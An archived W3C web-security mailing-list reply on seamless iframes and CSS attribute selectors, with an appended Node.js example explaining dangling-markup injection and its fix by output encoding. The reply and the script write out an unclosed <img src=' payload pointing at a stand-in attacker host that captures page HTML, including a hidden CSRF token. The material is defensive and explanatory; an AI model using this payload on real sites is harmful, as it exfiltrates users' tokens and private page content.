
Re: Seamless iframes + CSS3 selectors = bad idea

From: <sird@rckc.at>
Date: Tue, 8 Dec 2009 17:47:42 +0800
Message-ID: <8ba534860912080147u72c431ffsa805420b164b0fd8@mail.gmail.com>
To: Daniel Glazman <daniel@glazman.org>
Cc: Adam Barth <w3c@adambarth.com>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
@daniel, we are assuming the attacker can't inject JS.. so has no access to
the DOM.

On some browsers anyway, he could do <img src='
http://www.attacker.com/log?html=

without closing the tag and fetch everything.. but maybe that's a new attack
and needs a different thread as well.. hahaha

Greetings!!

-- Eduardo
http://www.sirdarckcat.net/

Sent from Hangzhou, 33, China

On Tue, Dec 8, 2009 at 5:42 PM, Daniel Glazman <daniel@glazman.org> wrote:

> Adam Barth wrote:
>
>>> 3. kill attribute selectors; will never happen, period.
>>
>> Can you elaborate on this point?  Why is this off the table?
>
> Because millions of people use it? Because millions of web sites
> use it? Because the feature is absolutely needed by them and it's
> not the right thing to do?
>
>> I don't understand why that would help.  Wouldn't the attacker simply
>> load their stylesheet in a non-sandboxed mode?
>
> If the attacker has the ability to load in non-sandboxed mode, he/she
> has the ability to (a) create a <link> or <style> element and then CSS
> is the least problem since the attacker has access to the whole DOM
> (b) be a man-in-between and replace a linked stylesheet by his/her own;
> again, if he/she can do that, targeting JS is a much better option.
>
> </Daniel>
>
Received on Tuesday, 8 December 2009 09:48:45 GMT
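The unclosed `<img src='http://www.attacker.com/log?html=` trick Eduardo mentions above is what is now usually called dangling markup injection, and it matters for this thread because it needs no JavaScript and no stylesheet at all: the HTML tokenizer stays in the single-quoted attribute value state and swallows everything that follows, up to the next apostrophe in the page, into the image URL. The script below is an added example, not code from the thread or from any W3C deliverable; the reflected page, the `t0k3n-5ecret` value and the `www.attacker.com` host are all constructed for it. It models that tokenizer behaviour on a string, shows which bytes would reach the attacker's log, and shows that ordinary contextual output encoding (angle brackets and both quote characters) closes the hole. The caveat behind Eduardo's "on some browsers": no request is made if no closing quote exists before end of file, and current Chromium additionally refuses to fetch a URL that still contains a raw newline together with a `<`, so the exact page layout decides whether the leak fires.

```javascript
// Added example (not from the thread): model of the "unclosed <img src='"
// exfiltration, with the page, secret and attacker host constructed here.

const ATTACKER_PREFIX = "http://www.attacker.com/log?html=";

// A constructed page that reflects a user-supplied display name. The page's
// own attributes use double quotes; the only single quote after the injection
// point is the apostrophe in "Don't", which is what finally closes the value.
function renderPage(displayName) {
  return [
    "<html><body>",
    "<p>Hello, " + displayName + "</p>",
    '<form action="/transfer">',
    '  <input type="hidden" name="csrf" value="t0k3n-5ecret">',
    "</form>",
    "<p>Don't forget to log out.</p>",
    "</body></html>",
  ].join("\n");
}

// Minimal model of the HTML tokenizer's "attribute value (single-quoted)"
// state: find the first <img src=' and take everything up to the next
// apostrophe. If no closing quote exists the tokenizer hits EOF inside the
// tag, emits no <img> element and therefore makes no request; return null.
function danglingImgRequest(page) {
  const open = "<img src='";
  const start = page.indexOf(open);
  if (start < 0) return null;
  const valueStart = start + open.length;
  const end = page.indexOf("'", valueStart);
  if (end < 0) return null;
  // A real browser strips tab/newline when resolving the URL and
  // percent-encodes the rest; the encoding is not the point here, so the
  // raw attribute value is returned as the browser would have collected it.
  const value = page.slice(valueStart, end);
  return value.startsWith(ATTACKER_PREFIX)
    ? { url: value, leaked: value.slice(ATTACKER_PREFIX.length) }
    : null;
}

// Contextual output encoding for HTML text and attribute content. With '<'
// and both quote characters encoded, the payload can neither open a tag nor
// leave an attribute value dangling.
function escapeHtml(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// The injected display name: an <img> whose src attribute is never closed.
const PAYLOAD = "<img src='" + ATTACKER_PREFIX;

// What the attacker's log receives when the name is reflected verbatim.
function vulnerableLeak() {
  return danglingImgRequest(renderPage(PAYLOAD));
}

// Same payload through output encoding: no <img> is ever tokenized.
function hardenedLeak() {
  return danglingImgRequest(renderPage(escapeHtml(PAYLOAD)));
}

if (typeof require !== "undefined" && require.main === module) {
  const leak = vulnerableLeak();
  console.log("vulnerable page leaks:\n" + leak.leaked);
  console.log("hardened page leaks:", hardenedLeak());
}
```

Run with `node dangling.js`: the vulnerable page hands the attacker the closing `</p>`, the whole transfer form including the hidden `csrf` value, and the start of the next paragraph; the hardened page yields `null`. The model deliberately ignores URL canonicalisation and browser-side blocking so that the tokenizer behaviour itself is visible.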
